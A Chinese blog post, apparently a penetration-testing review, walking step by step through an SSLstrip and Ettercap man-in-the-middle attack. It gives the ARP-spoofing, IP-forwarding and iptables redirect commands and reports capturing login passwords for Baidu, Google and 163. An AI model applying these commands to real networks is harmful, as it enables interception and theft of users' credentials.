SSLstrip 中间人欺骗Https转Http获取密码
程序员文章站
2022-03-05 16:08:48
渗透回顾
SSLstrip + EtterCap 中间人攻击实现https转换成http 以获取帐号密码。
Linux环境下 我们使用iptables过滤一下数据包,然后用sslstrip...
渗透回顾
SSLstrip + EtterCap 中间人攻击实现https转换成http 以获取帐号密码。
Linux环境下 我们使用iptables过滤一下数据包,然后用sslstrip监听端口,获取数据。
数据包转发 echo 1 > /pro/sys/net/ipv4/ip_forward
然后开启Ettercap的iptables 功能
把注析去掉
来个arp欺骗不使用sslstrip 来测试一下https
Arpspoof –i –eth0 –t 192.168.1.102 192.168.1.2
Ok
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
NAT 一定的基础
-T 匹配的表 NAT表 :PREROUTING 修改来的包
:OUTPUT 修改路由前本地的包
:POSTROUTING 修改准备发出的包
-A 表示加入高级选项
-P 协议类型
-J 表示把目标80端口的数据包转到其他端口 上诉命令是10000端口
开启ETTERCAP
Ettercap –T –q –I eth0
登录http的百度 效果良好
监听到数据了
登录google
发现在https 卡顿 无法通过
开启sslstrip
再向google登录的时候 https变成http
成功登录
监听到帐号密码
百度的
163的登录
http的跳转
网速过慢……
除了使用arpspoof 还可以使用
Ettercap –T –q –M arp:remote /192.168.1.101/ //
也是arp欺骗 原理一样的